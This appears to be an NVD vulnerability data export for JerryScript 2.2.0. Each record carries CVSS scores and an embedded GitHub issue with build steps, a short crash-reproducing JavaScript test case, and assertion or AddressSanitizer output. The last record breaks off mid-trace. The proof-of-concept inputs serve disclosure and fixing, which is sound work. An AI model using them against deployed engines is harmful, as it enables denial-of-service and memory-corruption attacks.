"nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3823" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3823" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3823
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` function f ({"aba,a"}) { } ``` ###### Output ``` ICE: Assertion 'scope_stack_p > context_p->scope_stack_p' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_literal_is_created):2510. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'scope_stack_p > context_p->scope_stack_p' in scanner_literal_is_created
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3823/comments
0
2020-06-01T03:58:55Z
2020-06-03T13:28:14Z
https://github.com/jerryscript-project/jerryscript/issues/3823
628,134,730
3,823
2,040
CVE-2020-23314
2021-06-10T23:15:08.087
There is an Assertion 'block_found' failed at js-parser-statm.c:2003 parser_parse_try_statement_end in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3825" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3825" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3825
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision d06c3a7 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \ --error-messages=on --debug --compile-flag=-g --strip=off --logging=on \ --compile-flag=-fsanitize=address --stack-limit=15 ``` ###### Test case ``` var errorMessage = "toStringThrows" var toStringThrows = { "foo//bar/baz//foo" } try { var obj = {}; obj[toStringThrows] = 3; assert(false); } catch (e) { assert(e.message == errorMessage); } ``` ###### Output ``` ICE: Assertion 'block_found' failed at /home/JerryScript/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_try_statement_end):2003. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'block_found' in parser_parse_try_statement_end
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3825/comments
0
2020-06-01T04:41:43Z
2020-06-03T13:28:15Z
https://github.com/jerryscript-project/jerryscript/issues/3825
628,146,890
3,825
2,041
CVE-2020-23319
2021-06-10T23:15:08.137
There is an Assertion in '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3834" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3834" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3834
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision a56e31f ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g \ --strip=off --system-allocator=on --logging=on \ --linker-flag=-fuse-ld=gold --error-messages=on \ --profile=es2015-subset --lto=off --stack-limit=50 ``` ###### Test case ``` function dec(x) { return x - 1 }; for (var i = 11; ((123).toString(37)) = dec (i); i--) {} ``` ###### Output ``` ICE: Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' failed at /home/JerryScript/jerry-core/parser/js/js-parser-util.c(parser_emit_cbc_backward_branch):669. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3834/comments
0
2020-06-03T03:42:30Z
2020-06-03T13:29:27Z
https://github.com/jerryscript-project/jerryscript/issues/3834
629,668,362
3,834
2,042
CVE-2020-23320
2021-06-10T23:15:08.167
There is an Assertion in 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' in parser_parse_function_arguments in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3835" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3835" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3835
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision a56e31f ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g \ --strip=off --system-allocator=on --logging=on \ --linker-flag=-fuse-ld=gold --error-messages=on \ --profile=es2015-subset --lto=off --stack-limit=50 ``` ###### Test case ``` fn_expr = { "foo//b", } (function () { var a = [arguments]; })(); ``` ###### Output ``` ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/JerryScript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1705. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted (core dumped) ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' in parser_parse_function_arguments
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3835/comments
0
2020-06-03T04:04:08Z
2020-06-03T13:28:15Z
https://github.com/jerryscript-project/jerryscript/issues/3835
629,674,784
3,835
2,043
CVE-2020-23321
2021-06-10T23:15:08.197
There is a heap-buffer-overflow at lit-strings.c:431 in lit_read_code_unit_from_utf8 in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3870" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3870" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3870
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp("\ud800", "u").exec(1) ``` ###### Output ``` ================================================================= ==100375==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf610073f at pc 0x080c25d2 bp 0xffdaad88 sp 0xffdaad78 READ of size 1 at 0xf610073f thread T0 #0 0x80c25d1 in lit_read_code_unit_from_utf8 /home/jerryscript/jerry-core/lit/lit-strings.c:431 #1 0x80c2b8d in lit_cesu8_peek_next /home/jerryscript/jerry-core/lit/lit-strings.c:522 #2 0x80ea990 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:872 #3 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #4 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #5 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #6 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #7 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #8 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #9 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #10 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #11 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #12 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #13 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #14 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #15 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #16 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #17 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf610073f is located 0 bytes to the right of 15-byte region [0xf6100730,0xf610073f) allocated by thread T0 here: #0 0xf7ad9dee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x8061b1e in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:269 #6 0x8061b1e in ecma_new_ecma_string_from_utf8 /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:353 #7 0x8073bf5 in ecma_find_or_create_literal_string /home/jerryscript/jerry-core/ecma/base/ecma-literal-storage.c:134 #8 0x80c4501 in parser_compute_indicies /home/jerryscript/jerry-core/parser/js/js-parser.c:130 #9 0x80c61c6 in parser_post_processing /home/jerryscript/jerry-core/parser/js/js-parser.c:973 #10 0x80cbcb9 in parser_parse_source /home/jerryscript/jerry-core/parser/js/js-parser.c:2192 #11 0x80cf05a in parser_parse_script /home/jerryscript/jerry-core/parser/js/js-parser.c:2813 #12 0x804dc81 in jerry_parse /home/jerryscript/jerry-core/api/jerry.c:447 #13 0x804ac76 in main /home/jerryscript/jerry-main/main-unix.c:750 #14 0xf78a5636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/jerryscript/jerry-core/lit/lit-strings.c:431 lit_read_code_unit_from_utf8 Shadow bytes around the buggy address: 0x3ec20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec200d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3ec200e0: fa fa 00 05 fa fa 00[07]fa fa fd fa fa fa fd fd 0x3ec200f0: fa fa 00 00 fa fa 00 00 fa fa 00 06 fa fa 00 00 0x3ec20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3ec20130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==100375==ABORTING ``` Credits: This vulnerability is detected by chong from OWL337.
heap-buffer-overflow in lit_read_code_unit_from_utf8
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3870/comments
0
2020-06-06T14:03:56Z
2020-06-08T09:09:09Z
https://github.com/jerryscript-project/jerryscript/issues/3870
632,483,470
3,870
2,044
CVE-2020-23322
2021-06-10T23:15:08.257
There is an Assertion in 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3869" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3869" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "617" ]
617
https://github.com/jerryscript-project/jerryscript/issues/3869
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` function a ({ *=; }) ``` ###### Output ``` ICE: Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at /home/JerryScript/jerry-core/parser/js/js-parser-expr.c(parser_parse_object_initializer):3234. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted ``` Credits: This vulnerability is detected by chong from OWL337.
Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer
https://api.github.com/repos/jerryscript-project/jerryscript/issues/3869/comments
0
2020-06-06T13:55:33Z
2020-06-08T08:27:43Z
https://github.com/jerryscript-project/jerryscript/issues/3869
632,478,665
3,869
2,045
CVE-2020-23323
2021-06-10T23:15:08.293
There is a heap-buffer-overflow at re-parser.c in re_parse_char_escape in JerryScript 2.2.0.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3871" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/3871" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:2.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "88EBD351-0E34-480A-906A-603AC3920FBF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/jerryscript-project/jerryscript/issues/3871
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision cae6cd0 ###### Build platform Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --lto=off ``` ###### Test case ``` new RegExp('"\\u', 'u').exec(1) ``` ###### Output ``` ================================================================= ==105443==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf600073f at pc 0x080e94ba bp 0xffe285a8 sp 0xffe28598 READ of size 1 at 0xf600073f thread T0 #0 0x80e94b9 in re_parse_char_escape /home/jerryscript/jerry-core/parser/regexp/re-parser.c:615 #1 0x80ea114 in re_parse_next_token /home/jerryscript/jerry-core/parser/regexp/re-parser.c:753 #2 0x80eba19 in re_parse_alternative /home/jerryscript/jerry-core/parser/regexp/re-parser.c:1152 #3 0x80e642e in re_compile_bytecode /home/jerryscript/jerry-core/parser/regexp/re-compiler.c:131 #4 0x80afbd2 in ecma_op_create_regexp_from_pattern /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:347 #5 0x8129048 in ecma_builtin_regexp_dispatch_helper /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:174 #6 0x81290c1 in ecma_builtin_regexp_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp.c:218 #7 0x8080fed in ecma_builtin_dispatch_construct /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1260 #8 0x809866e in ecma_op_function_construct /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1275 #9 0x80f0e29 in opfunc_construct /home/jerryscript/jerry-core/vm/vm.c:866 #10 0x80ffbd2 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4237 #11 0x81000d5 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4318 #12 0x80eefc0 in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:338 #13 0x804e1ce in jerry_run /home/jerryscript/jerry-core/api/jerry.c:595 #14 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759 #15 0xf784a636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636) #16 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0) 0xf600073f is located 0 bytes to the right of 15-byte region [0xf6000730,0xf600073f) allocated by thread T0 here: #0 0xf7a7edee in malloc (/usr/lib32/libasan.so.2+0x96dee) #1 0x80be178 in jmem_heap_alloc /home/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x80be248 in jmem_heap_gc_and_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:289 #3 0x80be2c7 in jmem_heap_alloc_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:323 #4 0x8100214 in ecma_alloc_string_buffer /home/jerryscript/jerry-core/ecma/base/ecma-alloc.c:194 #5 0x80619da in ecma_new_ecma_string_from_utf8_buffer /home/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:258 #6 0x80619da in 